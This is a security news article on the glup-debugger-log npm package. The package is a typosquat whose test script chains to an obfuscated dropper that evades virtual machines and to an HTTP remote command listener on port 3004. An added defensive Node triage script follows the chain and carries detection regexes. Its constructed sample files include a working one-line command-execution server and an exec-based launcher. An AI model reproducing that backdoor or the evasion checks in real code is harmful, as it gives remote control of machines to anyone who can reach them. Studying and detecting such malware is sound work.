Cybersecurity researchers have uncovered a new suspicious package uploaded to the npm package registry that is designed to drop a remote access trojan (RAT) on compromised systems.
The package in question is glup-debugger-log, a name that transposes two letters of the gulp build toolkit; it targets gulp users by masquerading as a "logger for gulp and gulp plugins." It has been downloaded 175 times to date.
Software supply chain security firm Phylum, which discovered the package, said it comes fitted with two obfuscated files that work in tandem to deploy the malicious payload.
“One worked as a kind of initial dropper setting the stage for the malware campaign by compromising the target machine if it met certain requirements, then downloading additional malware components, and the other script providing the attacker with a persistent remote access mechanism to control the compromised machine,” it said.
Phylum's closer examination of the library's package.json file, which acts as a manifest listing all metadata associated with a package, found that its test script runs a JavaScript file ("index.js") that, in turn, invokes an obfuscated JavaScript file ("play.js"). Because npm scripts run from the command line without the developer ever opening the package source, a script entry is a convenient place to hide the entry point of a payload.
The second JavaScript file functions as a dropper that fetches next-stage malware, but not before running a series of checks for network interfaces, for a specific type of Windows operating system (Windows NT), and, in an unusual twist, for the number of files in the Desktop folder.
“They check to ensure that the Desktop folder of the machine’s home directory contains seven or more items,” Phylum explained.
“At first glance, this may seem absurdly arbitrary, but it’s likely that this is a form of user activity indicator or a way to avoid deployment on controlled or managed environments like VMs or brand new installations. It appears the attacker is targeting active developer machines.”
Assuming all the checks pass, it launches another JavaScript file configured in package.json ("play-safe.js") to set up persistence. The loader also packs in the capability to execute arbitrary commands fetched from a URL or read from a local file.
The "play-safe.js" file, for its part, starts an HTTP server that listens on port 3004 for incoming commands, which are then executed on the host. The server sends the command output back to the client as a plaintext response, so anyone who can reach that port on the compromised machine, not only the original attacker, can drive it.
Phylum described the RAT as both crude and sophisticated: crude because of its minimal functionality and self-contained nature, sophisticated because of its reliance on obfuscation to resist analysis.
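The chain described above (a package.json script that runs index.js, which loads an obfuscated play.js, plus a separate play-safe.js listener) is the kind of thing a reviewer can triage statically before ever running `npm test` or `npm install`. The following Node script is an added example written for this article; it is not Phylum's tooling and not code from the glup-debugger-log package. It parses a manifest, follows each script's `node <file>` target and its relative `require()` chain, and flags source-level markers that correspond to the behaviour reported here: hex-escaped strings and `_0x` identifiers typical of JavaScript obfuscators, use of `child_process`, an HTTP server that calls `listen`, a directory listing rooted in the home directory, and hard-coded URLs. The sample manifest, file contents, package name and IP address are constructed placeholders, and the indicator list and review threshold are heuristics chosen for the example, not a signature for this campaign.

```javascript
// Added example (not Phylum's tooling, not the glup-debugger-log source):
// static triage of an npm package's manifest and the scripts it wires up.
// Everything named SAMPLE_* below is constructed for this example.

// Source-level indicators as [name, regexp]. One hit is weak evidence;
// several together on one file are worth a human look. Heuristic only.
const INDICATORS = [
  ['hex-escaped-strings', /\\x[0-9a-f]{2}\\x[0-9a-f]{2}/i],
  ['obfuscator-identifiers', /\b_0x[0-9a-f]{4,}\b/],
  ['dynamic-code-eval', /\b(eval|Function)\s*\(/],
  ['shell-execution', /require\(\s*['"]child_process['"]\s*\)|\bexec(Sync)?\s*\(/],
  ['http-listener', /createServer\s*\([\s\S]{0,200}?\.listen\s*\(/],
  ['home-directory-listing', /readdirSync\s*\([^)]*homedir/],
  ['hard-coded-url', /https?:\/\/[^'"\s]+/],
];
const REVIEW_THRESHOLD = 3; // total hits at or above this => flag for review

// `node <file>` targets in an npm script command line, e.g. "node index.js".
function scriptTargets(command) {
  const out = [];
  const re = /\bnode\s+([^\s&|;]+\.c?js)/g;
  let m;
  while ((m = re.exec(command)) !== null) out.push(m[1]);
  return out;
}

// Relative require() targets, so the index.js -> play.js hop is followed.
// Deliberately simple: no node_modules resolution, no extension guessing.
function localRequires(source) {
  const out = [];
  const re = /require\(\s*['"](\.\.?\/[^'"]+)['"]\s*\)/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1].replace(/^\.\//, ''));
  return out;
}

function scanSource(source) {
  return INDICATORS.filter(([, re]) => re.test(source)).map(([name]) => name);
}

// manifestText: package.json contents; files: { relativePath: sourceText }.
function triagePackage(manifestText, files) {
  const manifest = JSON.parse(manifestText);
  const findings = [];
  const seen = new Set();
  const visit = (script, file) => {
    if (seen.has(file)) return;
    seen.add(file);
    const source = files[file];
    if (source === undefined) {
      // A script pointing at a file that is not in the tarball is itself odd.
      findings.push({ script, file, indicators: ['file-missing'] });
      return;
    }
    findings.push({ script, file, indicators: scanSource(source) });
    for (const dep of localRequires(source)) visit(script, dep);
  };
  for (const [script, command] of Object.entries(manifest.scripts || {})) {
    for (const target of scriptTargets(command)) visit(script, target);
  }
  const score = findings.reduce((n, f) => n + f.indicators.length, 0);
  const verdict = score >= REVIEW_THRESHOLD ? 'review' : 'ok';
  return { name: manifest.name, findings, score, verdict };
}

// Constructed sample modelled on the chain described in the article:
// test script -> index.js -> obfuscated play.js; play-safe.js as a listener.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-debugger-log', // placeholder, not the real package name
  version: '1.0.0',
  scripts: { test: 'node index.js', 'play-safe': 'node play-safe.js' },
});
const SAMPLE_FILES = {
  'index.js': "require('./play.js');\n",
  'play.js': [
    "const os=require('os'),fs=require('fs'),cp=require('child_process');",
    "var _0x3a1f=['\\x44\\x65\\x73\\x6b\\x74\\x6f\\x70'];", // spells 'Desktop'
    "const STAGE2='http://203.0.113.10/stage2';", // placeholder address
    "if(fs.readdirSync(os.homedir()+'/'+_0x3a1f[0]).length>=7){cp.exec('node play-safe.js');}",
  ].join('\n'),
  'play-safe.js':
    "const http=require('http'),cp=require('child_process');" +
    "http.createServer((q,s)=>{cp.exec(q.url.slice(1),(e,o)=>s.end(o));}).listen(3004);",
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triagePackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
}
```

Run against the constructed sample, play.js alone trips five indicators and play-safe.js two, so the package is reported for review; a benign manifest whose test script only prints a string scores zero. The point of walking the `require()` chain is that the script entry in package.json (index.js here) can be completely innocuous, with the obfuscated logic one hop away, exactly as described for this package. Regex matching is easy to evade, so treat the output as a prompt for manual review of the named files, not as a verdict.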
“It continues to highlight the ever-evolving landscape of malware development in the open source ecosystems, where attackers are employing new and clever techniques in an attempt to create compact, efficient, and stealthy malware they hope can evade detection while still possessing powerful capabilities,” the company said.